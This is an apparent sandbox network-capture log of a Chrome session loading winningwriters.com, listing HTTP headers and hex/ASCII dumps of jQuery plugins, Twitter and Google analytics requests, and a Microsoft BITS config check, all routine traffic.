                                                                                                                                                                                            ETag: "c31-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3121
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:09 UTC3121INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 43 6f 6f 6b 69 65 20 50 6c 75 67 69 6e 20 76 31 2e 34 2e 30 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 61 72 68 61 72 74 6c 2f 6a 71 75 65 72 79 2d 63 6f 6f 6b 69 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 20 4b 6c 61 75 73 20 48 61 72 74 6c 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 66 61 63 74 6f 72 79 29 20 7b 0a 09 69 66 20 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 64 65 66 69 6e 65 2e 61 6d 64 29 20 7b 0a 09 09 2f 2f 20 41 4d 44 0a 09 09 64 65 66 69 6e 65 28 5b 27 6a 71 75 65 72 79 27 5d 2c 20 66
                                                                                                                                                                                            Data Ascii: /*! * jQuery Cookie Plugin v1.4.0 * https://github.com/carhartl/jquery-cookie * * Copyright 2013 Klaus Hartl * Released under the MIT license */(function (factory) {if (typeof define === 'function' && define.amd) {// AMDdefine(['jquery'], f


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            69192.168.2.164979766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC921OUTGET /assets/js/jquery.matchHeight-min.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
                                                                                                                                                                                            2024-11-18 20:00:09 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "d35-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3381
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:09 UTC3381INData Raw: 2f 2a 0a 2a 20 6a 71 75 65 72 79 2d 6d 61 74 63 68 2d 68 65 69 67 68 74 20 30 2e 37 2e 32 20 62 79 20 40 6c 69 61 62 72 75 0a 2a 20 68 74 74 70 3a 2f 2f 62 72 6d 2e 69 6f 2f 6a 71 75 65 72 79 2d 6d 61 74 63 68 2d 68 65 69 67 68 74 2f 0a 2a 20 4c 69 63 65 6e 73 65 20 4d 49 54 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 74 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72
                                                                                                                                                                                            Data Ascii: /** jquery-match-height 0.7.2 by @liabru* http://brm.io/jquery-match-height/* License MIT*/!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof module&&module.exports?module.exports=t(require("jquer


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            70192.168.2.1649803162.159.140.2294436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1028OUTGET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31 HTTP/1.1
                                                                                                                                                                                            Host: t.co
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:09 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Content-Type: image/gif;charset=utf-8
                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            perf: 7402827104
                                                                                                                                                                                            Set-Cookie: muc_ads=198b7abe-d754-428d-93d1-280e07e96045; Max-Age=63072000; Expires=Wed, 18 Nov 2026 20:00:09 GMT; Path=/; Domain=t.co; Secure; SameSite=None
                                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0
                                                                                                                                                                                            x-transaction-id: 26c7167cade9ed70
                                                                                                                                                                                            strict-transport-security: max-age=0
                                                                                                                                                                                            x-response-time: 4
                                                                                                                                                                                            x-connection-hash: 116a175ae863bb01227ec7d07c75fbe3ddbe908d6def0ed342f8c347d344e3e9
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Set-Cookie: __cf_bm=YvbiLUCv27xU6sXb6u99f5YtcMZtwRaq5lqK8RLL_dQ-1731960009-1.0.1.1-xor7FCo35fsi53YGdQYzYIVvOrY2Iv4cfzo77P27PiGwzQFlpWyshQH__KGy2UqNZtp8B8E7wGUQ2lm861uFAw; path=/; expires=Mon, 18-Nov-24 20:30:09 GMT; domain=.t.co; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                            Server: cloudflare tsa_b
                                                                                                                                                                                            CF-RAY: 8e4a8b8cdac145fc-DFW
                                                                                                                                                                                            2024-11-18 20:00:09 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 09 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,L;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            71192.168.2.1649795184.28.90.27443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                            2024-11-18 20:00:09 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                            Server: ECAcc (lpl/EF4C)
                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                                                            Cache-Control: public, max-age=161115
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            72192.168.2.1649801173.194.76.1574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC906OUTPOST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-216038-1&cid=723902191.1731960008&jid=878809402&gjid=1037938329&_gid=1788557778.1731960008&_u=YGBAgEABAAAAAGAAI~&z=1716026079 HTTP/1.1
                                                                                                                                                                                            Host: stats.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                            2024-11-18 20:00:10 UTC993INHTTP/1.1 200 OK
                                                                                                                                                                                            Access-Control-Allow-Origin: https://winningwriters.com
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Last-Modified: Sun, 17 May 1998 03:00:00 GMT
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgdc:149:0
                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                            Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgdc:149:0"}],}
                                                                                                                                                                                            Server: Golfe2
                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1INData Raw: 31
                                                                                                                                                                                            Data Ascii: 1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            73192.168.2.1649806104.244.42.674436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC1045OUTGET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31 HTTP/1.1
                                                                                                                                                                                            Host: analytics.twitter.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC572INHTTP/1.1 200 OK
                                                                                                                                                                                            date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            perf: 7402827104
                                                                                                                                                                                            server: tsa_b
                                                                                                                                                                                            set-cookie: personalization_id="v1_mSmLoy3+5VWQAU9epQPbgw=="; Max-Age=63072000; Expires=Wed, 18 Nov 2026 20:00:09 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                                                            content-type: image/gif;charset=utf-8
                                                                                                                                                                                            cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                            content-length: 43
                                                                                                                                                                                            x-transaction-id: d69359d610283cbd
                                                                                                                                                                                            strict-transport-security: max-age=631138519
                                                                                                                                                                                            x-response-time: 72
                                                                                                                                                                                            x-connection-hash: 94e899d615020fe9283047d8b59502422309a3e12e1dec72fc4511122958115b
                                                                                                                                                                                            connection: close
                                                                                                                                                                                            2024-11-18 20:00:10 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 09 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,L;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            74192.168.2.1649802146.75.120.1574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC352OUTGET /uwt.js HTTP/1.1
                                                                                                                                                                                            Host: static.ads-twitter.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 58876
                                                                                                                                                                                            Last-Modified: Tue, 29 Oct 2024 01:22:31 GMT
                                                                                                                                                                                            ETag: "4328e910de583ad53b3a7a76455af005"
                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            X-Served-By: cache-iad-kiad7000145-IAD, cache-fra-etou8220034-FRA
                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                            Vary: Accept-Encoding,Host
                                                                                                                                                                                            P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
                                                                                                                                                                                            x-tw-cdn: FT
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 36 31 37 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3b 74 2e 65 78 70 6f 72 74 73 3d 28 72 3d 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 28 72 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 63 72 79 70 74 6f 26 26 28 72 3d 73 65 6c 66 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 26 26 28 72 3d
                                                                                                                                                                                            Data Ascii: !function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 74 68 69 73 2e 77 6f 72 64 73 3d 74 7c 7c 5b 5d 2c 74 68 69 73 2e 73 69 67 42 79 74 65 73 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 34 2a 74 2e 6c 65 6e 67 74 68 7d 2c 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 7c 7c 66 29 2e 73 74 72 69 6e 67 69 66 79 28 74 68 69 73 29 7d 2c 63 6f 6e 63 61 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 77 6f 72 64 73 2c 6e 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 2c 69 3d 74 2e 73 69 67 42 79 74 65 73 3b 69 66 28 74 68 69 73 2e 63 6c 61 6d 70 28 29 2c 72 25 34 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 61 3d 6e 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 72 2b 6f
                                                                                                                                                                                            Data Ascii: this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||f).stringify(this)},concat:function(t){var e=this.words,n=t.words,r=this.sigBytes,i=t.sigBytes;if(this.clamp(),r%4)for(var o=0;o<i;o++){var a=n[o>>>2]>>>24-o%4*8&255;e[r+o
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 64 2e 70 61 72 73 65 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 29 29 7d 7d 2c 70 3d 63 2e 42 75 66 66 65 72 65 64 42 6c 6f 63 6b 41 6c 67 6f 72 69 74 68 6d 3d 75 2e 65 78 74 65 6e 64 28 7b 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 64 61 74 61 3d 6e 65 77 20 73 2e 69 6e 69 74 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 3d 30 7d 2c 5f 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 68 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74
                                                                                                                                                                                            Data Ascii: ion(t){return d.parse(unescape(encodeURIComponent(t)))}},p=c.BufferedBlockAlgorithm=u.extend({reset:function(){this._data=new s.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=h.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigByt
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 65 28 72 29 26 26 28 69 3c 38 26 26 28 63 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 75 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72 2b 2b 7d 28 29 3b 76 61 72 20 73 3d 5b 5d 2c 6c 3d 61 2e 53 48 41 32 35 36 3d 6f 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 69 2e 69 6e 69 74 28 63 2e 73 6c 69 63 65 28 30 29 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 72 3d 6e 5b 30 5d 2c 69 3d 6e 5b 31 5d 2c 6f 3d 6e 5b 32 5d 2c 61 3d 6e 5b 33
                                                                                                                                                                                            Data Ascii: r(var r=2,i=0;i<64;)e(r)&&(i<8&&(c[i]=n(t.pow(r,.5))),u[i]=n(t.pow(r,1/3)),i++),r++}();var s=[],l=a.SHA256=o.extend({_doReset:function(){this._hash=new i.init(c.slice(0))},_doProcessBlock:function(t,e){for(var n=this._hash.words,r=n[0],i=n[1],o=n[2],a=n[3
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 68 69 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 79 70 65 6f 66 20 74 2b 22 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 28 63 61 6e 6e 6f 74 20 72 65 61 64 20 70 72 6f 70 65 72 74 79 20 53 79 6d 62 6f 6c 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 29 29 22 29 29 3b 76 61 72 20 72 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 3b 69 66 28 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 28 5b 5d 29 3b 76 61 72 20 69 3d 72 2e 6c 65 6e 67 74
                                                                                                                                                                                            Data Ascii: r i=function(t){return new this((function(e,n){if(!t||void 0===t.length)return n(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(t);if(0===r.length)return e([]);var i=r.lengt
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 76 6f 69 64 20 64 28 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 70 28 28 72 3d 6e 2c 69 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 61 70 70 6c 79 28 69 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2c 74 29 7d 74 2e 5f 73 74 61 74 65 3d 31 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 63 61 74 63 68 28 65 29 7b 66 28 74 2c 65 29 7d 76 61 72 20 72 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 74 2e 5f 73 74 61 74 65 3d 32 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 29 7b 32 3d 3d 3d 74 2e 5f 73 74 61 74 65 26 26 30 3d 3d 3d 74 2e 5f 64 65 66 65 72 72 65 64 73 2e 6c 65 6e 67 74 68 26 26 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e
                                                                                                                                                                                            Data Ascii: void d(t);if("function"==typeof n)return void p((r=n,i=e,function(){r.apply(i,arguments)}),t)}t._state=1,t._value=e,d(t)}catch(e){f(t,e)}var r,i}function f(t,e){t._state=2,t._value=e,d(t)}function d(t){2===t._state&&0===t._deferreds.length&&u._immediateFn
